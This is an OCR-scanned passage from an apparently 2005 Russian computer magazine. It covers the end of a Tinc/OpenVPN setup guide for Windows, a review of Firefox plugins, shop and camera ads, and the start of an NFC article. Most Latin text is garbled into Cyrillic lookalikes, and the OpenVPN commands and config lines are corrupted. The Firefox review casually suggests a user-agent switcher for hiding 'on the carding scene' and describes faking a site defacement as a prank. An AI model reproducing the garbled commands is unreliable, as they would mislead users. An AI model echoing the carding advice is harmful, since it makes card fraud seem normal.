гза_кеу.ргіѵ. Закрытый ключ (гза_кеу.ргіѵ) остается на серверной маши- 
не, в то время как открытый (гза_кеу.риЬ) распространяется всем дове- 
ренным лицам, то есть клиентам (идентификация клиентов осуществля- 
ется по открытому ключу). Итак, параметры соединения обозначены, 
ключи разосланы — можно поднимать соединение. Для этого запускай 
на обеих машинах демон ІіпссІ.ехе и жди, пока машины соединятся друг 
с другом. Процесс не займет много времени, и очень скоро ты будешь 
наслаждаться результатом. :) Кстати говоря, после первого запуска Ііпс 
автоматически пропишет себя в сервисы и будет автоматически запус- 
каться во время запуска ѴѴіпсІоѵѵз. 

[знакомство с ОрепѴРЫ] Тіпс — это, безусловно, отличная, но пока 
еще довольно экзотическая реализация ѴРЫ. Значительно большее 
распространение получила система ОрепѴРЫ. Ты наверняка встречал 
ее название в инете и на страницах нашего журнала — это лучшее до- 
казательство моих слов. Надо сказать, что славу она заслужила не слу- 
чайно. Это воистину очень мощная и надежная реализация ѴРЫ 55І_ со- 
единений. ОрепѴРЫ имеет два режима защиты. Первый базируется на 
331_/Т1_3 технологиях с использованием сертификатов и ключей. Второй 
— на использовании статических ключей. Я рассмотрю второй вариант 
как наиболее простой. Однако вариант с ЗЗЬсертификатами ни в коем 
случае не стоит сбрасывать со счетов, так как он считается более безо- 
пасным. Оставим его для самостоятельного освоения. В качестве при- 
мера мы возьмем довольно тривиальную задачу. Я предлагаю рассмот- 
реть случай, когда требуется наладить шифрованный канал связи меж- 
ду двумя узлами Интернета или локальной сети. Надо сказать, что это 
наиболее частая ситуация. 



[установка демона] Как полагается, начнем с процесса установки 
программы, который совершенно идентичен как для серверной, так и 
клиентской стороны. Дистрибутив ОрепѴРЫ распространяется в виде 
обычного исполняемого файла, поэтому единственное, что от тебя тре- 
буется, — запустить его и следовать инструкциям мастера. Для удоб- 
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установка ОрепѴРЫ 



ства дальнейшей настройки прог- 
рамму лучше будет установить не 
в директорию, предложенную ус- 
тановщиком по умолчанию, а в 
папку сЛОрепѴРЫ. Если во время 
установки появятся окна об уста- 
новке нового оборудования, не пу- 
гайся. Дело в том, что ОрепѴРЫ 
пропишет в систему драйвер для 
виртуального сетевого адаптера 
— ТАР-ѴѴіп32 Абаріег Ѵ8. Точно та- 
кого же, как и в случае Ііпс. 




После завершения установки приложения, переходи в «Сетевые подклю- 
чения» и найди там только что созданное подключение. Оно сразу бросит- 
ся тебе в глаза благодаря надписи «Сетевой кабель не подключен». Нас 
будут интересовать настройки протокола ТСР/ІР, в которых необходимо 
указать уникальные подсеть и маску подсети для нашей виртуальной сети. 
Пускай это будут подсеть 10.3.0.1/24 и маска подсети 255.255.255.0. Соот- 
ветственно, на одной из машин в качестве ІР-адреса мы указываем 
10.3.0.1, а на другой — 10.3.0.2 (выбор ІР-адресов произволен, главное, 
чтобы они «попали» в выбранную нами подсеть). Маска подсети в обоих 
случаях одинакова — 255.255.255.0. Еще раз акцентирую внимание, что 
выбранная подсеть не должна использоваться в реальной локальной сети. 
В противном случае ѴРЫ-соединение ты установить не сможешь! 

Теперь нужно сгенерировать статический ключ, который будет использовать- 
ся для шифрования трафика. Для этого в командной строке набери команду: 

С:\ОрепѴРІ\І>орепѵрп.ехе --раизе-ехИ: -ѵегЬ 3 -депкеу -зесгеі: 
«С:\ОрепѴРЫ\сопТі д\к еу . 1x1:" 

ОрепѴРЫ практически мгновенно создаст 2048-битный ключ и поместит 
его в файл кеу.М. Этот ключ необходимо по безопасному каналу пере- 
дать на удаленный сервер. Вариантов здесь много: можно, например, 
принести его туда на дискете :). 

Закончив с ключами, приступаем к конфигурационным файлам, пример 
которых разработчики любезно выложили в папке с:\ОрепѴРМ\затрІе- 
сопЯд\затрІе.оѵрп. Начинать нужно с того, что этот файл переименовать 
в сопіід.оѵрп и переместить в директорию с:\ОрепѴРЫ\сопІід. После это- 
го открой его в текстовом редакторе и приступай к редактированию: 

гетоіе <ІР-адрес удаленного компьютера> 

# Параметр указывает реальный ІР-адрес удаленного компьютера, 
к которому будет осуществляться подключение. 

сіеѵ іар 

# Так называем тип интерфейса. ОрепѴРИ поддерживает несколько 
вариаций, но в нашем случаем нам интересен именно сіеѵ Іар 
іТсопТід 10.3.0.1 255.255.255.0 

# ІР-адрес и маски подсети, указанные с помощью этого параметра, 
будут присвоены данному компьютеру по ѴРІ\І-соединению. 

зесгеі: с:\\орепѵрп\\сопІід\\кеу.М 

# Абсолютный путь до файла, содержащего ключ. Обрати внимание 
на двойные слэши! 

ріпд 10 

# Параметр ріпд указывает на то, что удаленный компьютер каждые 
десять секунд будет опрашиваться специальным ріпд-пакетом для 
проверки соединения. 

ѵегЬ 3 

# Уровень детализации Іод-файлов (может принимать значения от 0 до 9) 
тіЛе 10 

сотр-І 20 

# Разрешаем компрессию трафика 

На другой машине этот файл будет иметь следующий вид: 

гетоіе <ІР-адрес первого компьютера> 
сіеѵ іар 

ІТсопТід 10.3.0.2 255.255.255.0 

зесгеТ с:\\орепѵрп\\сопТід\\кеу.ТхТ 

ріпд 10 

ѵегЬ 3 

тіЛе 10 

сотр-І 20 

По большому счету, конфигурация ОрепѴРЫ завершена. Скрести паль- 
цы и в командной строке каждого из компьютеров набери: 

орепѵрп — сопТід с:\орепѵрп\сопТід\сопТід.оѵрп 

Если в трее исчез значок сетевого подключения с надписью «Сетевой 
кабель не подключен», можешь начинать радоваться. Это первый приз- 
нак того, что все заработало, как надо. Для большей уверенности про- 
пингуй удаленные машины по их ІР-адресам внутри ѴРЫ-сети. То есть 
запусти с первой машины ріпд 10.3.0.2. А со второй — ріпд 10.3.0.1 

[вместо заключения] Цель данной статьи — показать, что винда вполне ус- 
пешно может использоваться для организации ѴРЫ/ОрепѴРЫ подключений. 
Материал ни в коем случае не претендует на полный мануал к действию. Это 
невозможно в принципе, так как очень многое зависит от конкретных настро- 
ек сети, ее топологии и того, что ты хочешь добиться, используя ѴРЫ е 
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ЗДОРОВ, МИЛ ЧЕЛОВЕК! КАК ТЫ, НАВЕРНОЕ, 
ДОГАДАЛСЯ, СЕГОДНЯ Я РАССКАЖУ ТЕБЕ 
О ПЛАГИНАХ ДЛЯ ЛУЧШЕГО В МИРЕ БРАУЗЕРА 
— РІВЕРОХ. ХОТЯ ПОД ПЛАГИНОМ ДЛЯ РІВЕРОХ 
ОБЫЧНО ПОНИМАЮТ НЕМНОГО ДРУГОЕ, 

Я РАЗЛИЧИЙ МЕЖДУ НИМИ И РАСШИРЕНИЯМИ 
ДЛЯ ПРОСТОТЫ ДЕЛАТЬ НЕ БУДУ. ВСЕ 
НЕВЕРНЫЕ МОГУТ ИДТИ ЛЕСОМ СО СВОЕЙ 
ОПЕРОЙ И Т.П., ТАК КАК ИДЕОЛОГИЧЕСКИХ 
СПОРОВ ЗАТЕВАТЬ Я НЕ НАМЕРЕН. ТЕХ ЖЕ, 
КТО ДУШОЙ И СЕРДЦЕМ ОСТАВАЛСЯ С ЭТИМ 
ВЕЛИКОЛЕПНЫМ БРАУЗЕРОМ, И УБЕЖДАТЬ НЕ 
НАДО: ОНИ И ТАК ЗНАЮТ, ЧТО РІВЕРОХ 
(КСТАТИ, В НАРОДЕ ЭТО ЧУДО ЕЩЕ ШУТЛИВО 
КЛИЧУТ РВАЕВРОХ) —САМЫЙ БЫСТРЫЙ, САМЫЙ 
ТВИКАЕМЫЙ И САМЫЙ-САМЫЙ РАСШИРЯЕМЫЙ 
БРАУЗЕР В МИРЕ I ЗПасЮЗ (зІіасІ05@геаІ. хакер, ш) 



Обзор наиболее 
интересных плагинов 
для РігеРох 

Конечно, помимио уже перечисленного, есть в 
РігеРох еще один плюс: порты РігеРох'а есть и 
под ѴѴіпбоѵѵз, и под І_іпих, и под МасОЗ. Да во- 
обще, можно его собрать почти на любой *піх- 
Ііке системе, если у тебя прямые руки и компи- 
лятор дсс в них. 

Вся соль этого браузера как раз и состоит в его 
плагинах. Плагин в понимании файрфокса — 
это небольшая надстройка, которая добавляет 
браузеру новые функциональные возможности 
и фишки, начиная какой-нибудь простенькой 
кнопкой на панели, фильтрацией рекламы или 
управлением закачками и заканчивая совер- 
шенно новой функцией, такой как ІВС-клиент 
или управление медиаплеером. 

Собственно, плагин — это один архив с расши- 
рением *.хрі (произносится как «хиппи»), кото- 
рый устанавливается простым открытием че- 
рез главное меню «Файл -> Открыть». После 
перезапуска браузера плагин готов к примене- 
нию. Назвав расширение архивом, я отнюдь не 
ошибся: переименуй *.хрі в *.гір и ты увидишь 
все внутренности плагина. Например ріидіп.хрі, 
содержит следующее: 

ріидіп.хрі: 

іпзІаІІМ 

сіпготе.тапііезі 

(Фготе/ріидіп.іаг 

сотропепіз/... 

сіеіаиііз/... 



іпзіаіі.гсіі — ХМІ_ файл, который содержит ин- 
формацию о плагине, сііготе.тапііезі — тексто- 
вый файл, который сообщает файрфоксу, какие 
оверлеи, стили и локали подгрузить, чтобы 
обеспечить использование плагина. сІеІаиКз/ со- 
держит настройки по умолчанию. Может быть, 





если позволит «Святой Коннектий» 
и Марс будет в третьей фазе Луны, 
то после нового 2006-го года, отой- 
дя от праздничного похмелья, чер- 
кану пару строк в кодинг о написа- 
нии этих самых плагинов, тогда и 
рассмотрим все подробнее. 

В довесок к сплошным преиму- 
ществам, скажу, что для ѵѵеЬ-раз- 
работчиков РігеРох стал абсолют- 
но незаменимой утилитой для от- 
ладки, тестирования и разработ- 
ки сайтов. Для пользователей (да 
и не только) — отличной плат- 
формой, которая позволяет соз- 
дать браузер своей мечты, не 
прибегая к разработке собствен- 
ного движка и оболочки. А для 
программеров — еще одной заба- 
вой, позволяющей показать свое 
мастерство в написания плагинов 
на иаѵаЗсгірІ и Х1Л_ (смотри врез- 
ку). Тебе, как настоящему хакеру, 
нужно все это, а потому не будем 
тянуть кота за хвост и рассмотрим 
наиболее интересные расшире- 
ния прямо сейчас. 



ѵѵѵѵѵѵ.толЧа.огд — офици- 
альный сайт МоііІІа. 
шм.ппоібеѵ.огд — дом 
для множества МоііЧа-рас- 
ширений. 

шшш.тоііііа.ги — сайт рус- 
ского общества поддержки 
продуктов МоііІІа. 




Как всегда мы со Степом 
позаботились о контенте 
диска. Все последние вер- 
сии плагинов ты найдешь 
на нем. 



■9гц 




ЧТО ТАКОЕ XIII. И ДЛЯ 
ЧЕГО ОН НУЖЕН? 

XIII. расшифровывается 
как ХМІ_ Іізег-іпіеііасе 
І_апдиаде. Это подмноже- 
ство ХМІ_-языка, исполь- 
зуемое для описания ин- 
терфейса. Интерфейсы 



на основе этого языка 



- ІМеІзсаре'з Соттипісаіог 

- МоііІІа/МоііІІа РігеРох 

- Сатіпо 

- ^гіііа (аналог МогіІІа, 
написанный на ^ѵа), 



а также прочие из этой 
плеяды. Его можно так- 
же использовать отдель- 
но, вне браузеров, как 
поступают в среде разра- 
ботки АсІіѵеЗіаІе 
Котобо. 



умеют рисовать програм- 
мы, основанные на внут- 
реннем движке МогіІГы 
под названием (Веско. 
Этот внутренний движок 
используется в таких 
браузерах, как : 



[безопасность] Естественно, что сначала мы позаботимся о собственной 
безопасности и облачим РігеРох в непробиваемые доспехи в лице плагинов 
ІЧоЗсгірІ и АсІЫоск. 

Серфя инет в поисках заветной халявы, постоянно натыкаешься на 
зловредную рекламу. Можно, конечно, обвешаться кучей файрволов 
и блокеров рекламы, но гораздо эффективнее, на мой взгляд, все это 
спрятать в браузер в виде АсІЫоск. Этот плагин позволяет блокиро- 
вать загрузку баннеров, анимации, фреймов и изображений, исполь- 
зуя фильтры адресной строки по подстрокам и регулярным выраже- 
ниям. Эти фильтры можно создавать самому, блокируя каждое изоб- 









ЧТО ТАКОЕ ѴѴУ5ІѴѴУѲ? 

ѴѴУЗІѴѴУО (произносится как ѵѵіггу-ѵѵід, ѵѵиггу-ѵѵід или 
ѵѵіззу-ѵѵід) — это акроним для ѴѴІіаІ Уои Зее Із ѴѴІіаІ Уои 
Оеі ѴѴУЗІѴѴУО — класс визуальных ІпІпгіІ-редакторов, ав- 
томатически генерирующих код НТМІ_ параллельно с 
формированием пользователем ѵѵеЬ-страницы на экране 
монитора из стандартных элементов. 



ражениѳ вручную, или использо- 
вать импорт текстовых файлов- 
списков фильтров, который ты мо- 
жешь найти в Сети. Использовать 
АсІВІоск очень просто. Всего лишь 
щелкнув правой кнопкой и выбрав 
пункт АсІВІоск ..., в открывшемся окне ты сможешь менять адрес бло- 
кируемого элемента или создавать фильтр для данного сайта. Естест- 
венно, что такая полезная вещь, как блокировка рекламы, должна 
быть автоматизирована. И здесь нам на помощь приходит отличное 
расширение АсІВІоск РіІІегзеІ.О ІІрІоабег, являющееся надстройкой 
для АсІВІоск, которое автоматически загружает новые фильтры из Се- 
ти каждые 4 — 7 дней. Просто отличный дуэт получается. 

ЫоЗсгірІ — это экстразащита от ^ѵаЗсгір* и ^ѵа. Решение, которое 
предлагает этот плагин, простое, но эффективное — разрешить выпол- 
нение вышеназванных напастей только на доверенных сайтах и доме- 
нах, занося их списки в ѵѵНіІеІізІ'ы. Это позволит избавиться от проблем 
безопасности (в том числе, неизвестных), связанных с неконтролируе- 
мым выполнением ^ѵаЗсгірі и ^ѵа. 



[качать — не перекачать] Следующим плагином, без которого я 
совсем не представляю жизни с РігеРох, стал РІазИОоІ. Если ты привык 
использовать правильные менеджеры закачек, а не геморроиться со 
встроенными качалками, то это твой выбор. РІазПОоІ поддерживает 
множество внешних менеджеров закачек для ѴѴіпсІоѵѵз, І_іпих, МасОЗ и 
РгееВЗЭ, среди которых РІазИѲеІ (именно для этого менеджера и был 
изначально разработан РІазПОоІ), РІеОеІ, Ооѵѵпіоасіег Іог X и другие, не 
менее известные (полный список можно посмотреть на 
ѵѵѵѵѵѵ.ііазіідоі.пеі). Вся функциональность РІазПОоІ сводится к трем но- 
вым пунктам контекстного меню, которые появляются после установки: 
ОоѵѵпІоасІ ѵѵШі РІазПОоІ, РІазНѲоІ АП и ВиіІсІ ОаІІегу. Понятно, что они 
обеспечивают доступ к аналогичным действиям качалки. Первая из них 

передает менеджеру закачек адрес 
файла, вторая — адрес страницы, 
соответственно, третья позволяет 
выкачивать все изображения со 
страницы, что особенно пригодится 
частым посетителям раздела нашего 
сайта мѵил. хакер. ги/рогпо. В допол- 
нение к РІазНѲоІ советую тебе, о, 
многоуважаемый, поставить плагин 
РОР ОоѵѵпІоасІ, который позволяет 
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выбирать, просматривать РЭЕ-файл либо 
внутри браузера (в виде РЭЕ или НТМІ_), либо 
закачивать его к себе на комп. Он же решает 
проблему конвертации РЭЕ в НТМІ_, которая 
существовала в РігеРох и иногда приводила к 
его подвисанию. 



[кукисы] Этот раздел я отвел для специаль- 
ных расширений, позволяющих просматри- 
вать и редактировать кукисы. Первый номер 
Ѵіеѵѵ Соокіез — утилита, которая добавляет 
закладку Соокіе на страницу Раде ІпТо и позволяет просматривать и ре- 
дактировать «печенья», установленные текущей страницей. Второй 
плагин — АбсІ N ЕсШ Соокіез — обладает еще более широкими возмож- 
ностями, позволяя еще и создавать новые кукисы. Пожалуй, второй но- 
мер и поудобнее будет. 




[псевдодефейс] Ты когда-нибудь ломал сайт тісгозоП.сот ? Нет? 
Как ни странно, и я не ломал. Но всех друзей я в этом могу убедить 
очень легко — ловкость рук и никакого мошенничества. Здесь на по- 
мощь мне придут два незаменимых хакерских плагина: Огеазетопкеу и 
Ріаіуриз. Первый из них позволяет добавить собственный ^ѵаЗсгірІ для 
любого сайта, а Ріаіуриз позволяет полностью модифицировать страни- 
цу из твоего браузера в ѴѴѴЗІѴѴѴО -режиме (смотри врезку), а затем сох- 
ранить ее как Огеазетопкеу-скрипт, который будет запускаться каждый 
раз, когда ты будешь заходить на данную страницу. Стоит отметить, что 
Огеазетопкеу уже имеет в своем составе более сотни очень полезных 
скриптов, так что тебе почти не придется тратить время на написание 
новых. И еще хочу тебя предупредить: не пугай бедных ламеров этими 
шутками. Тебе самому потом хуже будет. Как-то раз в институте я пог- 
лумился таким образом над доодіе.ги — от сокурсников отбоя не было. 
Меня очень долго просили показать, как я это сделал, но маги своих 
секретов не раскрывают :). 



ХВЕІ_ 

ХВЕІ_ (ХМІ_ язык обмена закладками), разработанный 
РуіИоп ХМІ _ ЗресіаІ Іпіегезі Огоир, является ХМІ_ форма- 
том для хранения и обмена закладками между приложе- 
ниями. Браузеры, такие как Оаіеоп, используют ХВЕІ_ 
для хранения закладок. ЫпкаОоОо 
(тт .Ипкадодо.сот/до/СопѵегІ) предлагает онлайновую 
конвертацию закладок из браузеров (включая ІЕ, МогіІІа, 
ІЧеІзсаре, РігеРох, и Орега) в ХВЕІ_. Вооктагкз 
Зупсіігопізег сам по себе имеет функцию существующих 
закладок в ХВЕЬфайл. 




[проксифицируемся и анонимизируемся] Без анонимных прок- 
сиков и соксов в наше время жить нельзя. А еще лучше жить с цепоч- 
кой этих носков. Где достать столь редкий продукт — тема не этой 
статьи, а вот как удобнее их использовать — этот вопрос идет напря- 
мую к ЗѵѵіісГі Ргоху ТооІ. Эта утилитка наравне с ЕІазІіОоІ стала частью 
моего джентльменского набора для РігеРох. Нужна она для быстрой 
смены проксиков или зоскз-серверов, через которые ты пускаешь свой 
[Шр-трафик. Принцип использования ЗѵѵіісГі Ргоху ТооІ очень простой. 
Этот плагин встраивает дополнительную панель, которая показывает 
используемый в данный момент проксик и позволяет добавлять, уда- 
лять или редактировать списки доступных. А если ты еще и изегадепі 
свой решил скрыть, чтобы не палиться ввиду специфики своей работы 
на кардерской сцене, то обязательно поставь себе расширение ІІзег 
Адепі ЗѵѵіІсГіег, которое позволит пудрить мозги кому угодно. Лично я 



редактор СобеІсН 



красуюсь под ѴѴіпсІоѵѵз ѴізІа/ЕігеЕох 1.0.7. И моя строка изегадеп* све- 
тится вот таким образом: Мо2ІІІа/5.0 (ѴѴіпсІоѵѵз; II; ѴѴіпсІоѵѵз І\ІТ 6.0; еп- 
113; гѵ: 1 .7. 1 0) Ѳеско/20050716 РігеРох/1 .0.7. Прикольно, правда? Адми- 
ны просто в ужасе :). 

[закладки и не только] Скорее всего, ты, как и я, много времени 
проводишь в поисках чего-либо очень-очень нужного. А когда нахо- 
дишь — обязательно помещаешь столь необходимый сайт в закладки. 
Тогда тем более ты понимаешь, как обидно терять эти закладки в ре- 
зультате несчастных случаев, происходящих с твоей виндой или браузе- 
ром. Чтобы этого не произошло, юзай Вооктагкз Васкир — незамени- 
мая вещь при бэкапе настроек РігеРох'а. Доподлинно неизвестно, поче- 
му называется это расширение именно Вооктагкз Васкир, ведь функци- 
ей, следующей из названия, оно не ограничива- 
ется. Вооктагкз Васкир создает бэкапы настро- 
ек юзера в его профиле, который хранится в 
С:Юоситепіз апб Зеіііпдз\<имя пользовате- 
ля > \АррІісаііоп О а іа 1 МоііИа 1 Пгеіох\РгоііІез\ <Имя 
профиля> или /боте/<имя пользовате- 
ля>/ .то 2 ІПа/іігеіох/<имя профиля> для ѴѴіпсІоѵѵз 
и І_іпих. Там эти бэкапы хранятся в течение не- 
дели. Таким образом, при крахе браузера необ- 
ходимо всего лишь переписать настройки со- 
держимым последнего каталогом из бэкапа. 
Вторым плагином из серии Вооктагкз является 
Вооктагкз Зупсіігопізег. Опять же, ты меня пой- 
мешь, если имеешь дело с Интернетом не толь- 
ко дома, но и на работе и/или в институте (нуж- 
ное подчеркнуть) и тебе приходится иметь го- 
ловную боль с переносом закладок с одной ма- 
шины на другую, особенно если эти машины 
крутятся под разными операционками. Лично 
мне раньше постоянно 
приходилось таскать 
линки из института до- 
мой в виде М-файлов на 
ІІЗВ-ІІазІі, пока я не 
повстречал Вооктагкз 
Зупсіігопізег. Вооктагкз 
Зупсіігопізег позволит 
тебе сохранять заклад- 
ки опііпе в виде ХВЕІ_- 




навороченный по самые помидоры Еігеіох 









Открой для себя 

новую 

реальность 



рс?п1іит ^ 



Благодаря компьютеру Ріехігоп ѴІР 
на базе процессора Іпіеі® Репііит® 4 
с технологией НТ Вы сможете 
насладиться реалистичными 
компьютерными играми. 



Компания Ф-Центр рекомендует МісгозоП® ѴѴіпсІоѵѵз® ХР. На компьютеры 
Нехігоп устанавливаются подлинные продукты семейства Місгозоп® 
ѴѴіпсІоѵѵз®. Гарантией качества и сервисной поддержки приобретаемых Вами 
продуктов МісгозоП® является наличие сертификата подлинности (СегШісаіе о! 
АиіЬепіісііу). 



САЛОНЫ-МАГАЗИНЫ: СЕРВИС-ЦЕНТР: 

ст.м. "Бабушкинская", ул. Сухонская, 7А (095)105-6447 ст.м. "Бабушкинская", ул. Молодцова, 1 (095)105-6447 

ст.м."Улица 1905 года", ул.Мантулинская, 2 . . .(095)105-6445 ФОТО ИНТЕРНЕТ КАФЕ: 

ст.м. "Владыкино", Алтуфьевское ш., 16 (095)105-6442 ст.м.'Ъладыкино", Алтуфьевское ш., 16 (095)105-6441 



КОМПЬЮТЕРЫ ОРГТЕХНИКА 
КОМПЛЕКТУЮЩИЕ 



3000 наименований товаров Самый выгодный кредит за 15 мин. Время работы: 10-20, без выходных Бесплат- 
ная доставка* Удобная автостоянка Резервирование товара через интернет Пункт обмена валюты Оплата кре- 
дитными картами Подарки покупателям Соответствие стандартам Техническая поддержка Магазин аксессуа- 
ров Магазин компьютерной литературы Обучающий курс для работы на ПК в комплекте 

* полную информацию о товарах и услугах в конкретных магазинах компании «Ф-Центр» уточняйте на сайте ѴУ.’ТСбПІбІГ.Ги 



Іпіеі, логотип Іпіеі, Іпіеі Іпзісіе, логотип Іпіеі Іпзісіе, Іпіеі Сепігіпо, логотип Іпіеі Сепігіпо, Сеіегоп, Іпіеі Хеоп, Іпіеі ЗреесіЗІер, Ііапіит, Репііит и Репііит III Хеоп являются товарными знаками или заре- 
гистрированными товарными знаками корпорации Іпіеі и ее подразделений в США и других странах. 



интернет-магазин 
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Новое Фото-Интернет кафе уже открыто! На базе компьютеров РІ-ЕХТКОІЧ. 

Фото 10x15=5 руб., чашка кофе=35 руб., Интернет=50 руб. 
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иконка Соокіе Есіііог на панели 



файла (и опять отправляю тебя на врезку), а по- 
том автоматически скачивать его при старте 
РігеРох и восстанавливать линки, а потом снова 
сохранять изменения на РТР- или ѴѴеЬОАѴ-сер- 
вере. Вооктагкз ЗупсІігопізег позволяет закачи- 
вать и скачивать закладки как автоматически, так 
и вручную при каждом старте и завершении рабо- 
ты браузера. Кроме того, закладки можно как пе- 
резаписывать, так и дополнять по твоему выбору. 

Естественно, что для корректного использования 

этого плагина тебе потребуется немного места на том самом РТР или 
ѴѴеЬОАѴ сервере и, естественно, легальный доступ к нему. Вдобавок к это- 
му тебе необходимо иметь одинаковые настройки РігеРох и ЗупсІігопізег'а 
на обеих машинах, иначе — мементо море... Моментально — ив море. 

[музыкальная шкатулка] Следующий плагин по сути никакого отноше- 
ния в веб-серфингу не имеет, однако смотрится стильно и достаточно удо- 
бен для настоящих ѵѵеЬ-маньяков, которые, в принципе, не живут без Ин- 
тернета. РохуТипез поз- 



воляет контролировать 
твой медиаплеер пря- 
мо из РігеРох, поэтому 
тебе больше не при- 
дется сворачивать бра- 
узер для того, чтобы 
пропустить следующий 
трек. РохуТипез предс- 
тавляет собой набор 
кнопок: ріау, зіор, Іог- 
ѵѵагсі и полосы прокрут- 
ки с названием песни 
над панелью состоя- 
ния. Конечно же, Роху- 
Типез поддерживает 
ѴѴіпатр, а кроме того: 
ѴѴіпсІоѵѵз Мебіа РІауег, 
іТипез, ІооЬаг2000, Ми- 
зістаІсИ, Оиіпіеззепйаі, 
ХМ Ріау, и. Віѵег, \е\- 
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просмотр сохраненных кукисов 




Заде РЗЗ Веабег 



Аибіо, МебіаМопкеу, Мебіа РІауег СІаззіс, Зопіцие, ѵѵхМизік, РІеаІРІауег, 
ХММЗ, Гѵіоаіип, бик, атагоК, Мизіс РІауег Оаетоп, ВИуіИтЬох и огромное 
множество других, перечислять которые у меня нет возможности в рам- 
ках этой статьи. 

[П88 пеѵѵзіеііегз] В РігеРох есть встроенная поддержка ВЗЗ-лент как 
часть І_іѵе Вооктагкз, однако я тебе советую использовать Заде ВЗЗ 
геабег как более функциональную и мощную утилиту. 

Заде может работать с ВЗЗ 2.0, 1 .0, 0.9х и Аіот-лентами напрямую из 
закладок РігеРох, обновлять ВЗЗ-ленты как автоматически, так и в 
ручном режиме. 

[мышиная возня] Плагин АІІ-іп-Опе (Зезіигез есть ничто иное, как 
изобретение для ленивых и суперпродвинутых. С его помощью ты мо- 
жешь настроить браузер на выполнение обычных действий с помощью 
жестов мышью. Производя на экране мыслимые и немыслимые пируэ- 
ты мышью, ты можешь сохранять страницы, закрывать вкладки и вы- 
полнять другие не менее необычные вещи. Выглядит поразительно и в 
стиле технологий будущего... 

[ѵѵеЬ-разработчикам и иже с ними] Естественно, если ты за- 
нимаешься разработкой сайтов, тебе необходим хороший редактор. 
Встроенные средства РігеРох на это совсем непригодны и здесь те- 
бе в помощь простой, но очень полезный плагин ѴіеѵѵЗоигсе ѴѴіІП. Он 
позволяет открыть текущую страницу в твоем любимом редакторе, 
будь то ВІиеІізИ или РадеМакег. Безусловно, 
ѴіеѵѵЗоигсе ѴѴіІН можно сконфигурировать и 
для некоторых других редакторов. Вторая 
полезная вещь — ѴѴеЬ Оеѵеіорег — большой 
набор простых функций, просто необходи- 
мых в нелегком деле верстки и дизайна 
страниц. Поставить этот плагин есть резон и 
тем, кто далек от разработки сайтов. Увидев 
его, сам все поймешь. Ну и напоследок пару 
слов о моем любимом ѴѴУЗІѴѴУО-редакторе 
Собеіесіі. Хотя он не так уж популярен, цен- 
ности своей от этого он не теряет. Среди его 
возможностей стоит отметить встроенную 
Іаѵазсгірі-консоль, ѴѴЗС-валидатор и воз- 
можность просмотра в других браузерах. 
Мне этих функций вполне хватило, чтобы от- 
казаться от таких достаточно известных пла- 
гинов, как ІЕ Ѵіеѵѵ, баѵаЗсгірІ Сопзоіе, 
ѴіеѵѵЗоигсе ѴѴібі и ІМѴІІ. Их ты можешь уста- 
новить и изучить сам, если захочешь. 

Ну что же, не будем 
долго прощаться. Если 
я забыл какой-нибудь 
действительно очень по- 
лезный плагин — пиши 
обязательно. Буду рад 
прочитать твое мнение. 

На этом я тебя покидаю. 

Жди статьи о написании 
плагинов в кодинге © 










, 2005. Косіак и ЕазуЗІпаге являются торговыми марками Еазітап Косіак Сотрапу. 



МЫ ЖИВЕМ В БЕЗГРАНИЧНОМ МИРЕ. 
ТЕПЕРЬ ПОЯВИЛАСЬ КАМЕРА, 
СПОСОБНАЯ ЭТО ПЕРЕДАТЬ. 




Расширяйте границы каждого снимка. Ведь с новой цифровой камерой Косіак ЕавуЗІіаге Р880 с зум- 
объективом это стало просто. Широкоугольный объектив (24-140 мм), 5,8-кратный зум, 2,5-дюймовый 
ЖК-дисплей, видеосъемка ѴОА-разрешения со скоростью 30 кадров в секунду и зумированием, 
возможность редактирования и выделения отдельных кадров видео, поддержка ВАѴѴ-формата - 
вот далеко не все достоинства этой новинки. Безграничный мир вокруг нас 
только и ждет, чтобы его сфотографировали. Подробности на ѵѵѵѵѵѵ.косіак.ги. ІХѴиСІІѴ 



Рекомендуем карты памяти Косіак. 



Товар сертифицирован. 



ЮНИТЫ КРЕАТИФФ КОДИНГ ІІЫІХОЮ СЦЕНА ВЗЛОМ ИМПЛАНТ РС_20ЫЕ РЕВРШМ НЬЮСЫ 





Технологию І\ІТС поддержи- 
вает Ѵіза Іпіегпаііопаі. Как 
сказал Джим Ли (Лт іее), 
один из заметных фигур в 
руководстве компании, 
«Ѵіза всегда поддерживает 
новые направления в об- 
ласти бесконтактной опла- 
ты, и поэтому мы будет пи- 
онерами в новом сервисе 
вместе с І\Іокіа». 

Подробнее здесь — 

ѵѵѵѵѵѵ.ріііІірз.ги/аЬоиі/пешз/ 

рге55/зесііоп-13648/аі1ісІе- 



и/и/и /.ізо.огд/ізо/еп/ргобз- 
зег/ісез/ІЗОзІоге/зіоге.ііітІ — 
здесь можно купить копию 
стандарта І\ІТС 
шшш.пІсЛогит.огд — ассо- 
циация производителей, 
поддерживающих ИТС 
еіесігопісз .Ію шзіиНтгкз . с 
от/зтагі-іаЬеі.іііт — опи- 
сание технологии ЯТЮ 
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Швейцарский 
ножик ІѴІРС 

ПО ФУНКЦИОНАЛЬНОСТИ СОТОВЫЙ ТЕЛЕФОН 
ВСЕ БОЛЬШЕ СТАЛ НАПОМИНАТЬ ШВЕЙЦАРС- 
КИЙ НОЖИК. РАЗНИЦА ЛИШЬ В ТОМ, ЧТО У 
ОДНОГО В НАБОРЕ ХОРОШЕЕ РЕЖУЩИЕ ЛЕЗ- 
ВИЕ, НОЖНИЦЫ, ОТКРЫВАЛКА И ПРОЧАЯ 
ЕРУНДА, А У ДРУГОГО — ПОДДЕРЖКА САМЫХ 
СОВРЕМЕННЫХ ТЕХНОЛОГИЙ (ММ3, ОРВЗ, 
ЕйСЕ), ВСТРОЕННАЯ КАМЕРА НА НЕСКОЛЬКО 
МЕГАПИКСЕЛЕЙ, МРЗ-ПЛЕЕР И ДИКТОФОН. 
КАЗАЛОСЬ БЫ, ЧТО ЕЩЕ МОЖНО ВЫЖАТЬ ИЗ 

СОТОВОГО... I Степан Ильин ака 51ер (зІер@датеІапсІ.ги) 



Несколько слов 
о мегамодной новинке 
в сфере мобильной связи 

[кратко о главном] На самом деле, многое! 
Почему бы не сделать из телефона эдакий коше- 
лек, с помощью которого нужно покупать билеты 
на концерт, лишь прикоснувшись трубкой к пест- 
рому плакату звезды? Или как тебе эта идея: реа- 
лизовать функции электронного ключа, чтобы без 
излишних усилий открывать двери дома, в маши- 
не и на работе? Тебе в голову придет и не такое, 
когда ты познакомишься со всеми возможностя- 
ми новой технологии беспроводной связи І\ІРС. 
Беспроводная связь — это уже не ново. Все эти 
технологии вроде ВІиеІооІП и ѴѴі-Рі стали нас- 
только обыденными, что на них попросту боль- 
